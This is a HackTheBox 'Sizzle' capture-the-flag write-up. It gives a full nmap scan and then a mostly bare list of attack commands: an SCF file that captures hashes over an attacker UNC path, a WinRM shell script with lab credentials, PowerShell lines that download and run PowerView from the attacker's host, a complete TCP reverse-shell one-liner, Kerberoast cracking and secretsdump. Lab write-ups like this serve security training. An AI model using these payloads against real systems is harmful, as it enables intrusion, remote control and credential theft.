HackTheBox-Sizzle

NMAP

Nmap scan report for 10.129.158.103
Host is up (0.15s latency).
Not shown: 65507 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49694/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49695/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC

PORT 21 (FTP)

Seeing ftp running we can check for anonymous login which was allowed but there wasn’t anything there

PORT 80 (HTTP)

Visiting port 80 we see an image of a sizzle

PORT 139/445 (SMB)

We can try to run enum4linux which is used to enumerate smb shares to gather information about operating system , listing shares and if possible will try to gather usernames from LDAP and RPC

[Shell]
Command=2
IconFile=\\10.10.14.58\uwu\uwu.ico
[Taskbar]
Command=ToggleDesktop
openssl req -new -newkey rsa:2048 -nodes -keyout arz.key -out arz.csr
openssl x509 -inform der -in certnew.cer -noout -text
require 'winrm'conn = WinRM::Connection.new(
endpoint: 'https://10.129.157.36:5986/wsman',
transport: :ssl,
:client_cert => 'cert.cer',
:client_key => 'arz.key',
user: 'amanda',
password: 'Ashare1972',
:no_ssl_peer_verification => true

)
command=""conn.shell(:powershell) do |shell|
until command == "exit\n" do
print "PS > "
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
python3 bloodhound.py -d HTB.local -u 'Amanda' -p 'Ashare1972' -c all -ns 10.129.158.71
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.55:2222/PowerView.ps1');
powershell -version 2 -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.55:2222/PowerView.ps1');"
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.55",3333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Invoke-WebRequest http://10.10.14.55:2222/powershell_rev.ps1 -outfile shell.ps1powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'
$Password = ConvertTo-SecureString 'Ashare1972' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\amanda', $Password)
hashcat -a 0 -m 13100 hash2.txt /opt/SecLists/Passwords/rockyou.txt --force
python3 secretsdump.py htb.local/mrlky:Football#7@10.129.158.71

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store